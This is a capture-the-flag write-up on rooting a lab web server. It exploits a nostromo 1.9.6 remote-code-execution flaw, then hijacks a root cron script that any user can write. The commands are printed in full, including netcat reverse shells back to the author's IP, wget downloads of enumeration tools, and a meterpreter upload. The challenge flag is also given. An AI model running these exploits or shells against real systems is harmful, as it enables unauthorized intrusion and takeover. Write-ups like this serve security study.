MY_FIRST_BLOG
Here is a link to my new blog! I read about a bunch of exploits in common server side blog tools so I just decided to make my website static. Hopefully that should keep it secure. Root owns the flag. http://172.30.0.2/ my-first-blog.ovpn
Given the my-first-blog.ovpn file.
I connect to the server.
$ sudo openvpn my-first-blog.ovpn
I saw the blog.
I checked the port with nmap.
$ nmap -sC -sV 172.30.0.2 Starting Nmap 7.80 ( https://nmap.org ) at 2020-03-22 06:53 EDT Nmap scan report for 172.30.0.2 Host is up (0.13s latency). Not shown: 999 closed ports PORT STATE SERVICE VERSION 80/tcp open http nostromo 1.9.6 |_http-generator: Hugo 0.54.0 |_http-server-header: nostromo 1.9.6 |_http-title: My first blog! Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 119.48 seconds
Server uses nostromo 1.9.6.
The following RCE can be used:
nostromo 1.9.6 - Remote Code Execution - Multiple remote Exploit
My ip is 172.30.0.14.
I listened on 4444 port and ran a reverse shell on server.
$ nc -lnvp 4444
$ python cve2019_16278.py 172.30.0.2 80 "mkfifo /tmp/mwodv; nc 172.30.0.14 4444 0</tmp/mwodv | /bin/sh >/tmp/mwodv 2>&1; rm /tmp/mwodv" _____-2019-16278 _____ _______ ______ _____\ \ _____\ \_\ | | | / / | | / /| || / / /|/ / /___/| / / /____/||\ \ \ |/| |__ |___|/ | | |____|/ \ \ \ | | | \ | | _____ \| \| | | __/ __ |\ \|\ \ |\ /| |\ \ / \ | \_____\| | | \_______/ | | \____\/ | | | /____/| \ | | / | | |____/| \|_____| || \|_____|/ \|____| | | |____|/ |___|/
I got webserver's shell.
$ nc -lnvp 4444 listening on [any] 4444 ... connect to [172.30.0.14] from (UNKNOWN) [172.30.0.2] 50206 whoami webserver
We can use wget.
wget wget: missing URL Usage: wget [OPTION]... [URL]... Try `wget --help' for more options.
I uploaded pspy64s and linpeas to server's tmp directory.
GitHub - DominicBreuker/pspy: Monitor linux processes without root permissions
$ python3 -m http.server
cd /tmp wget http://172.30.0.14:8000/pspy64s wget http://172.30.0.14:8000/linpeas.sh
ls linpeas.sh nostromo-1.9.6 oncufxq pspy64s shell.elf start.sh chmod +x pspy64s chmod +x linpeas.sh
I ran pspy64s.
2020/03/22 11:21:02 CMD: UID=1000 PID=12542 | /bin/sh 2020/03/22 11:21:02 CMD: UID=1000 PID=12525 | sed s,:.*,&, 2020/03/22 11:21:02 CMD: UID=1000 PID=12524 | head -n 70 2020/03/22 11:21:02 CMD: UID=1000 PID=12523 | awk -F: {if (pre != $1){ print $0; }; pre=$1} 2020/03/22 11:21:02 CMD: UID=1000 PID=12522 | grep -Ev 0{20,} 2020/03/22 11:21:02 CMD: UID=1000 PID=12521 | grep -v \.tif$\|\.tiff$\|\.gif$\|\.jpeg$\|\.jpg\|\.jif$\|\.jfif$\|\.jp2$\|\.jpx$\|\.j2k$\|\.j2c$\|\.fpx$\|\.pcd$\|\.png$\|\.pdf$\|\.flv$\|\.mp4$\|\.mp3$\|\.gifv$\|\.avi$\|\.mov$\|\.mpeg$\|\.wav$\|\.doc$\|\.docx$\|\.xls$\|\.xlsx$ 2020/03/22 11:21:02 CMD: UID=1000 PID=12520 | grep -v /.git/\|/sources/authors/ 2020/03/22 11:21:02 CMD: UID=1000 PID=12519 | grep -RIEHo \$2[abxyz]?\$[0-9]{2}\$[a-zA-Z0-9_/\.]*|[0-9a-zA-Z]{32}:[a-zA-Z0-9_]{16,32}|\$H\$[a-zA-Z0-9_/\.]{31}|\$P\$[a-zA-Z0-9_/\.]{31}|\$S\$[a-zA-Z0-9_/\.]{52}|\$1\$[a-zA-Z0-9_/\.]{8}\$[a-zA-Z0-9_/\.]{22}|\$apr1\$[a-zA-Z0-9_/\.]{8}\$[a-zA-Z0-9_/\.]{22}|\$6\$[a-zA-Z0-9_/\.]{16}\$[a-zA-Z0-9_/\.]{86}|\{SHA\}[0-9a-zA-Z/_=]{10,} /etc /var/backups /tmp /var/tmp /var/www /root /home /mnt 2020/03/22 11:21:02 CMD: UID=0 PID=11 | sleep 1000000 2020/03/22 11:21:02 CMD: UID=1000 PID=10 | nhttpd 2020/03/22 11:21:02 CMD: UID=0 PID=1 | bash /tmp/start.sh 2020/03/22 11:22:01 CMD: UID=0 PID=13302 | CRON 2020/03/22 11:22:01 CMD: UID=0 PID=13303 | /bin/sh -c /usr/bin/healthcheck 2020/03/22 11:22:01 CMD: UID=0 PID=13304 | /bin/bash /usr/bin/healthcheck
uid=0(root) ran /usr/bin/healthcheck.
Then server ran nc -z localhost 80.
Next, I ran linpeas.sh.
linpeas provides us various informations.
The important thing is the file to which you have write permission.
(snip) [+] Interesting writable Files [i] https://book.hacktricks.xyz/linux-unix/privilege-escalation#writable-files /dev/mqueue /dev/mqueue/linpeas.txt /dev/shm /run/lock /sys/firmware /tmp /tmp/linpeas.sh /tmp/pspy64s /tmp/shell.elf 93m/usr/bin/healthcheck /var/nostromo/conf /var/nostromo/conf/mimes /var/nostromo/conf/nhttpd.conf /var/nostromo/conf/nhttpd.conf-dist /var/nostromo/htdocs /var/nostromo/htdocs/cgi-bin /var/nostromo/htdocs/cgi-bin/printenv /var/nostromo/icons /var/nostromo/logs /var/nostromo/logs/access_log /var/nostromo/logs/nhttpd.pid /var/tmp (snip)
/usr/bin/healthcheck has write permission.
If we rewrite healthcheck and let cron run, we can get the root shell.
#!/bin/bash mkfifo /tmp/mwodv; nc 172.30.0.14 4446 0</tmp/mwodv | /bin/sh >/tmp/mwodv 2>&1; rm /t
I upload meterpreter payload and I used meterpreter upload module.
meterpreter > upload healthcheck [*] uploading : healthcheck -> healthcheck [*] Uploaded -1.00 B of 97.00 B (-1.03%): healthcheck -> healthcheck [*] uploaded : healthcheck -> healthcheck
I listened on 4446 port and I got root shell.
$ nc -lnvp 4446 listening on [any] 4446 ... connect to [172.30.0.14] from (UNKNOWN) [172.30.0.2] 59984 whoami root
So I got flag.
cd ls flag.txt cat flag.txt gigem{l1m17_y0ur_p3rm15510n5}
FLAG : gigem{l1m17_y0ur_p3rm15510n5}
thank you for reading.